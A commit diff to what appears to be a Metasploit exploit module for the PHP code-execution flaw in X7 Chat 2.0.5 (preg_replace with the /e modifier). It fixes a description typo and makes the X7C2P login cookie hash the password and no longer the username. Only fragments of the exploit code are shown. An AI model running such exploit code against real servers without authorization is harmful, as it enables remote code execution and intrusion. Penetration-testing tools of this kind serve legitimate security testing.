Fix value of X7C2P cookie and typo

itsecurityco · itsecurityco · commit 2e53027bb6f2 · 2014-10-29T08:32:36.000-05:00
diff --git a/modules/exploits/multi/http/x7chat2_php_exec.rb b/modules/exploits/multi/http/x7chat2_php_exec.rb
@@ -15,7 +15,7 @@ def initialize(info = {})
     super(update_info(info,
       'Name'           => 'The X7 Group X7 Chat 2.0.5 lib/message.php preg_replace() PHP Code Execution',
       'Description'    => %q{
-        Library lib/message.php for X7 Chat version 2.0.5 and 2.0.5.1 uses preg_replace() function with the /e modifier.
+        Library lib/message.php for X7 Chat versions 2.0.5 and 2.0.5.1 uses preg_replace() function with the /e modifier.
         This allows execute PHP code in the remote machine.
       },
       'License'        => MSF_LICENSE,
@@ -51,7 +51,7 @@ def check
   def exec_php(php_code, check = false)
 
     cookie_x7c2u = "X7C2U=#{ datastore['USERNAME'] }"
-    cookie_x7c2p = "X7C2P=#{ Rex::Text.md5(datastore['USERNAME']) }"
+    cookie_x7c2p = "X7C2P=#{ Rex::Text.md5(datastore['PASSWORD']) }"
     rand_text = Rex::Text.rand_text_alpha(5, 8)
 
     # remove comments, line breaks and spaces
